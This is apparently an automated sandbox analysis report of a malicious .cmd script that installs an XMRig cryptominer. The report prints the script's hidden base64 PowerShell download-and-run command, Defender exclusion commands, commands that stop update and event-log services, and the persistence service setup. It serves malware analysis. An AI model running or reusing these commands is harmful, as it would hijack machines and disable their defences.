Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 08:09
Static task
static1
Behavioral task
behavioral1
Sample
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd
Resource
win10v2004-20241007-en
General
-
Target
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd
-
Size
400B
-
MD5
2eeefd9c6e45d4aa21861b1296f67585
-
SHA1
a946bbc6ddecbfc98e418f5cd268fd9e31012f21
-
SHA256
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321
-
SHA512
ae169104fd73052c11deadc0b3470e6a64e53edc17818e75576c0077eef27a7633c6c94ea96f9ebfe4321f6184d448dd9b218aee35e6ffea40a446308af844e0
Malware Config
Extracted
https://biteblob.com/Download/J4wO2GduKNJmX3/build.exe
Signatures
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/2528-88-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-89-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-93-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-91-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-92-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-95-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-94-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-96-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/2528-97-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 3604 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3604 powershell.exe 2096 powershell.exe 1972 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 1 IoCs
flow pid Process 7 3604 powershell.exe -
Stops running service(s) 4 TTPs
-
Executes dropped EXE 2 IoCs
pid Process 1916 file.exe 3808 svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
flow ioc 21 raw.githubusercontent.com 30 raw.githubusercontent.com 31 raw.githubusercontent.com 29 raw.githubusercontent.com 32 raw.githubusercontent.com 33 raw.githubusercontent.com 22 raw.githubusercontent.com 23 raw.githubusercontent.com 24 raw.githubusercontent.com 25 raw.githubusercontent.com 28 raw.githubusercontent.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3896 powercfg.exe 1188 powercfg.exe 696 powercfg.exe 1108 powercfg.exe 3188 powercfg.exe 4948 powercfg.exe 1028 powercfg.exe 3952 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe file.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3808 set thread context of 740 3808 svchost.exe 141 PID 3808 set thread context of 2528 3808 svchost.exe 145 -
resource yara_rule behavioral2/memory/2528-84-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-85-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-83-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-86-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-88-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-89-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-87-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-93-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-91-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-92-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-95-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-94-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-96-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/2528-97-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4660 sc.exe 3352 sc.exe 2164 sc.exe 2784 sc.exe 8 sc.exe 1256 sc.exe 436 sc.exe 1692 sc.exe 4308 sc.exe 4620 sc.exe 976 sc.exe 3740 sc.exe 1436 sc.exe 3292 sc.exe -
Modifies data under HKEY_USERS 50 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3604 powershell.exe 3604 powershell.exe 1916 file.exe 2096 powershell.exe 2096 powershell.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 1916 file.exe 3808 svchost.exe 1972 powershell.exe 1972 powershell.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 3808 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe 2528 svchost.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 3604 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeShutdownPrivilege 1188 powercfg.exe Token: SeCreatePagefilePrivilege 1188 powercfg.exe Token: SeShutdownPrivilege 3188 powercfg.exe Token: SeCreatePagefilePrivilege 3188 powercfg.exe Token: SeShutdownPrivilege 696 powercfg.exe Token: SeCreatePagefilePrivilege 696 powercfg.exe Token: SeShutdownPrivilege 1108 powercfg.exe Token: SeCreatePagefilePrivilege 1108 powercfg.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeShutdownPrivilege 3896 powercfg.exe Token: SeCreatePagefilePrivilege 3896 powercfg.exe Token: SeShutdownPrivilege 3952 powercfg.exe Token: SeCreatePagefilePrivilege 3952 powercfg.exe Token: SeLockMemoryPrivilege 2528 svchost.exe Token: SeShutdownPrivilege 1028 powercfg.exe Token: SeCreatePagefilePrivilege 1028 powercfg.exe Token: SeShutdownPrivilege 4948 powercfg.exe Token: SeCreatePagefilePrivilege 4948 powercfg.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 400 wrote to memory of 3604 400 cmd.exe 83 PID 400 wrote to memory of 3604 400 cmd.exe 83 PID 3604 wrote to memory of 1916 3604 powershell.exe 84 PID 3604 wrote to memory of 1916 3604 powershell.exe 84 PID 2508 wrote to memory of 5000 2508 cmd.exe 97 PID 2508 wrote to memory of 5000 2508 cmd.exe 97 PID 3000 wrote to memory of 2240 3000 cmd.exe 128 PID 3000 wrote to memory of 2240 3000 cmd.exe 128 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 740 3808 svchost.exe 141 PID 3808 wrote to memory of 2528 3808 svchost.exe 145 PID 3808 wrote to memory of 2528 3808 svchost.exe 145 PID 3808 wrote to memory of 2528 3808 svchost.exe 145 PID 3808 wrote to memory of 2528 3808 svchost.exe 145 PID 3808 wrote to memory of 2528 3808 svchost.exe 145
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwczovL2JpdGVibG9iLmNvbS9Eb3dubG9hZC9KNHdPMkdkdUtOSm1YMy9idWlsZC5leGUiCiRmaWxlID0gIiRlbnY6VEVNUFxmaWxlLmV4ZSIKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRmaWxlClN0YXJ0LVByb2Nlc3MgIiRlbnY6VEVNUFxmaWxlLmV4ZSI=')))"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1916 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5000
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:3740
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:8
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1436
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "NPYIAYNC"4⤵
- Launches sc.exe
PID:3352
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto"4⤵
- Launches sc.exe
PID:3292
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:1256
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "NPYIAYNC"4⤵
- Launches sc.exe
PID:4308
-
-
-
-
C:\ProgramData\Microsoft\svchost.exeC:\ProgramData\Microsoft\svchost.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2240
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:436
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4620
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:976
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:740
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5d5a6408e58a8e6cdcac441b2724bdeea
SHA1c32347262903a5db5422c41c280fe975731155a1
SHA2566927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3
SHA512f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.0MB
MD5edc717098fd951b194c3960c5f263926
SHA18bb07cc625819cba2cba6b244ee4c4ca627caabe
SHA256278e58b92de21972a1a0384ced195d043e5fa94b1ed6301b18cfc93554df5a73
SHA51235ed392351161fbd1372119fde8bad1b3c0a709c24675913cbfc981ccd81297762520d99da41d8922206bce7b33619f8697cd997607152e59ec2d9a656d3b0ae